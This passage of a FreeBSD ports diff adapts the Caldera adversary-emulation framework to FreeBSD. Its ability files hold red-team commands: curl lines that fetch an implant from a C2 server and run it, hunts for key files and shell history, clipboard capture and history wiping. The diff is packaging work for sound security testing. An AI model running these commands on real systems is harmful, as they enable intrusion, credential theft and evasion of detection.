@@ -40,4 +40,4 @@
- plugins.stockpile.app.requirements.paw_provenance:
- source: directory.sensitive.backup
- plugins.stockpile.app.requirements.paw_provenance:
- - source: directory.sensitive.path
\ No newline at end of file
+ - source: directory.sensitive.path

18
security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}
@@ -31,4 +31,4 @@
- plugins.stockpile.app.requirements.paw_provenance:
- source: file.backup.name
- plugins.stockpile.app.requirements.paw_provenance:
- - source: file.sensitive.path
\ No newline at end of file
+ - source: file.sensitive.path

11
security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
mkdir -p /tmp/sensitive_file_backups;

18
security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
output="";
@@ -87,4 +87,4 @@
}
requirements:
- plugins.response.app.requirements.source_fact:
- - source: directory.sensitive.path
\ No newline at end of file
+ - source: directory.sensitive.path

18
security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
mkdir -p /tmp/sensitive_file_backups;
@@ -67,4 +67,4 @@
Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups;
requirements:
- plugins.response.app.requirements.source_fact:
- - source: file.sensitive.path
\ No newline at end of file
+ - source: file.sensitive.path

18
security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
mkdir -p /tmp/sensitive_file_backups;
@@ -104,4 +104,4 @@
then rm -f $file;
fi;
done;
- rm -rf /tmp/sensitive_file_backups;
\ No newline at end of file
+ rm -rf /tmp/sensitive_file_backups;

18
security/caldera4/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml
@@ -7,7 +7,7 @@
attack_id: x
name: x
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
echo '' > /tmp/cron_jobs;
@@ -32,4 +32,4 @@
cat /tmp/cron_jobs | sort > /tmp/baseline_cronjobs_list.txt;
rm /tmp/cron_jobs;
cleanup: |
- rm -f /tmp/baseline_cronjobs_list.txt
\ No newline at end of file
+ rm -f /tmp/baseline_cronjobs_list.txt

18
security/caldera4/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
mkdir -p /tmp/sensitive_file_backups;
@@ -100,4 +100,4 @@
do if [ ! -s $file ];
then rm -f $file;
fi;
- done;
\ No newline at end of file
+ done;

11
security/caldera4/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
output="";

14
security/caldera4/files/patch-plugins_sandcat_app_sand__svc.py Normal file
View file

@ -0,0 +1,14 @@
--- plugins/sandcat/app/sand_svc.py.orig 2022-07-20 19:48:00 UTC
+++ plugins/sandcat/app/sand_svc.py
@@ -56,7 +56,10 @@ class SandService(BaseService):
),
linux=dict(
cflags='CGO_ENABLED=1'
- )
+ ),
+ freebsd=dict(
+ cflags='CGO_ENABLED=1'
+ ),
)
if which('go') is not None:
if platform in compile_options.keys():

45
security/caldera4/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml Normal file
View file

@ -0,0 +1,45 @@
--- plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml.orig 2022-07-20 19:48:00 UTC
+++ plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -80,6 +80,42 @@
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
chmod +x #{agents.implant_name};
./#{agents.implant_name} -server $server -listenP2P -v
+ freebsd:
+ sh:
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name};
+ chmod +x #{agents.implant_name};
+ ./#{agents.implant_name} -server $server -group red -v
+ variations:
+ - description: Deploy as a blue-team agent instead of red
+ command: |
+ server="#{app.contact.http}";
+ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+ nohup ./$agent -server $server -group blue &
+ - description: Download with a random name and start as a background process
+ command: |
+ server="#{app.contact.http}";
+ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+ nohup ./$agent -server $server &
+ - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+ chmod +x #{agents.implant_name};
+ ./#{agents.implant_name} -server $server -group red -v
+ - description: Download with GIST C2
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
+ chmod +x #{agents.implant_name};
+ ./#{agents.implant_name} -c2 GIST -v
+ - description: Deploy as a P2P agent with known peers included in compiled agent
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
+ chmod +x #{agents.implant_name};
+ ./#{agents.implant_name} -server $server -listenP2P -v
windows:
psh:
command: |

16
security/caldera4/files/patch-plugins_sandcat_update-agents.sh Normal file
View file

@ -0,0 +1,16 @@
--- plugins/sandcat/update-agents.sh.orig 2022-07-20 19:48:00 UTC
+++ plugins/sandcat/update-agents.sh
@@ -1,10 +1,11 @@
-#!/bin/bash
+#!/bin/sh
# generates payloads for each os
-function build() {
+build() {
GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go
GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go
GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go
+GOOS=freebsd go build -o ../payloads/sandcat.go-freebsd -ldflags="-s -w" sandcat.go
}
cd gocat && build
cd ..

12
security/caldera4/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/app/obfuscators/base64_basic.py.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/app/obfuscators/base64_basic.py
@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator):
return dict(
windows=['psh'],
darwin=['sh'],
- linux=['sh']
+ linux=['sh'],
+ freebsd=['sh']
)
""" EXECUTORS """

12
security/caldera4/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/app/obfuscators/base64_jumble.py.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/app/obfuscators/base64_jumble.py
@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator):
return dict(
windows=['psh'],
darwin=['sh'],
- linux=['sh']
+ linux=['sh'],
+ freebsd=['sh']
)
def run(self, link, **kwargs):

12
security/caldera4/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/app/obfuscators/base64_no_padding.py.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/app/obfuscators/base64_no_padding.py
@@ -8,7 +8,8 @@ class Obfuscation(BaseObfuscator):
return dict(
windows=['psh'],
darwin=['sh'],
- linux=['sh']
+ linux=['sh'],
+ freebsd=['sh']
)
def run(self, link, **kwargs):

12
security/caldera4/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/app/obfuscators/caesar_cipher.py.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/app/obfuscators/caesar_cipher.py
@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator):
return dict(
windows=['psh'],
darwin=['sh'],
- linux=['sh']
+ linux=['sh'],
+ freebsd=['sh']
)
""" EXECUTORS """

12
security/caldera4/files/patch-plugins_stockpile_app_obfuscators_steganography.py Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/app/obfuscators/steganography.py.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/app/obfuscators/steganography.py
@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator):
def supported_platforms(self):
return dict(
darwin=['sh'],
- linux=['sh']
+ linux=['sh'],
+ freebsd=['sh']
)
""" EXECUTORS """

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
@@ -15,7 +15,7 @@
parsers:
plugins.stockpile.app.parsers.ssh:
- source: remote.ssh.cmd
- linux:
+ freebsd,linux:
sh:
command: |
pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g'

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml
@@ -33,7 +33,7 @@
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.dir.staged
- linux:
+ freebsd,linux:
sh:
command: |
chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml
@@ -8,7 +8,7 @@
attack_id: T1560.001
name: "Archive Collected Data: Archive via Utility"
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg
@@ -29,4 +29,4 @@
- source: host.dir.compress
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.staged
\ No newline at end of file
+ - source: host.dir.staged

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml
@@ -12,7 +12,7 @@
sh:
command: |
cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}
- linux:
+ freebsd,linux:
sh:
command: |
cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml
@@ -17,7 +17,7 @@
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.dir.staged
- linux:
+ freebsd,linux:
sh:
command: |
mkdir -p staged && echo $PWD/staged

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml
@@ -6,7 +6,7 @@
attack_id: T1005
name: Data from Local System
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do
@@ -21,4 +21,4 @@
Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;
parsers:
plugins.stockpile.app.parsers.basic:
- - source: host.dir.git
\ No newline at end of file
+ - source: host.dir.git

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml
@@ -12,7 +12,7 @@
sh:
command: |
curl #{remote.host.socket}
- linux:
+ freebsd,linux:
sh:
command: |
curl #{remote.host.socket}

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml
@@ -27,7 +27,7 @@
- source: host.file.path
edge: has_extension
target: file.sensitive.extension
- linux:
+ freebsd,linux:
sh:
command: |
find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml
@@ -16,7 +16,7 @@
psh,pwsh:
command: |
Get-Clipboard -raw
- linux:
+ freebsd,linux:
sh:
command: |
xclip -o

15
security/caldera4/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml Normal file
View file

@ -0,0 +1,15 @@
--- plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml
@@ -24,3 +24,12 @@
python ragdoll.py -W $server#{app.contact.html}
cleanup: |
pkill -f ragdoll
+ freebsd:
+ sh:
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py;
+ pip install requests beautifulsoup4;
+ python ragdoll.py -W $server#{app.contact.html}
+ cleanup: |
+ pkill -f ragdoll

12
security/caldera4/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml
@@ -20,3 +20,9 @@
parsers:
plugins.stockpile.app.parsers.ssh:
- source: remote.ssh.cmd
+ freebsd:
+ sh:
+ command: cat ~/.history
+ parsers:
+ plugins.stockpile.app.parsers.ssh:
+ - source: remote.ssh.cmd

13
security/caldera4/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml Normal file
View file

@ -0,0 +1,13 @@
--- plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml
@@ -19,7 +19,7 @@
sh:
command: |
for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done;
- linux:
+ freebsd,linux:
sh:
command: |
- for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done;
\ No newline at end of file
+ for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done;

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml
@@ -11,7 +11,7 @@
darwin:
sh:
command: sleep 60
- linux:
+ freebsd,linux:
sh:
command: sleep 60
windows:

15
security/caldera4/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml Normal file
View file

@ -0,0 +1,15 @@
--- plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml
@@ -16,6 +16,10 @@
sh:
command: |
> $HOME/.bash_history && unset HISTFILE
+ freebsd:
+ sh:
+ command: |
+ > $HOME/.history && set history = 0
windows:
psh:
- command: Clear-History;Clear
\ No newline at end of file
+ command: Clear-History;Clear

17
security/caldera4/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml Normal file
View file

@ -0,0 +1,17 @@
--- plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml
@@ -12,11 +12,11 @@
sh:
cleanup: |
rm #{payload}
- linux:
+ freebsd,linux:
sh:
cleanup: |
rm #{payload}
windows:
psh,pwsh:
cleanup: |
- Remove-Item -Force -Path "#{payload}"
\ No newline at end of file
+ Remove-Item -Force -Path "#{payload}"

15
security/caldera4/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml Normal file
View file

@ -0,0 +1,15 @@
--- plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml
@@ -25,9 +25,9 @@
path="$(pwd)/#{exe_name}";
num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
- linux:
+ freebsd,linux:
sh:
command: |
path="$(pwd)/#{exe_name}";
num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
- if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
\ No newline at end of file
+ if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml
@@ -12,7 +12,7 @@
sh:
command: |
find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
- linux:
+ freebsd,linux:
sh:
command: |
find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml
@@ -12,7 +12,7 @@
sh:
command: |
ps
- linux:
+ freebsd,linux:
sh:
command: |
ps

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml
@@ -12,7 +12,7 @@
sh:
command: |
nmap -sV -p #{remote.host.port} #{remote.host.ip}
- linux:
+ freebsd,linux:
sh:
command: |
nmap -sV -p #{remote.host.port} #{remote.host.ip}

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
@@ -12,7 +12,7 @@
sh:
command: |
ps aux | grep #{host.user.name}
- linux:
+ freebsd,linux:
sh:
command: |
ps aux | grep #{host.user.name}

17
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml Normal file
View file

@ -0,0 +1,17 @@
--- plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml
@@ -28,3 +28,14 @@
target: remote.host.port
payloads:
- scanner.py
+ freebsd:
+ sh:
+ command: |
+ python3.9 scanner.py -i #{remote.host.ip}
+ parsers:
+ plugins.stockpile.app.parsers.scan:
+ - source: remote.host.ip
+ edge: has_open_port
+ target: remote.host.port
+ payloads:
+ - scanner.py

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml
@@ -12,7 +12,7 @@
sh:
command: |
ls
- linux:
+ freebsd,linux:
sh:
command: |
ls

12
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
@@ -42,6 +42,6 @@
darwin:
sh:
command: ps aux
- linux:
+ freebsd,linux:
sh:
- command: ps aux
\ No newline at end of file
+ command: ps aux

12
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml Normal file
View file

@ -0,0 +1,12 @@
--- plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
@@ -15,6 +15,6 @@
darwin:
sh:
command: groups
- linux:
+ freebsd,linux:
sh:
- command: groups
\ No newline at end of file
+ command: groups

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml
@@ -12,7 +12,7 @@
sh:
command: |
cat ~/.ssh/known_hosts
- linux:
+ freebsd,linux:
sh:
command: |
cat ~/.ssh/known_hosts

13
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml Normal file
View file

@ -0,0 +1,13 @@
--- plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
@@ -15,6 +15,10 @@
sh:
command: |
netstat -anto
+ freebsd:
+ sh:
+ command: |
+ netstat -aSp tcp
windows:
psh:
command: |

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml Normal file
View file

@ -0,0 +1,11 @@
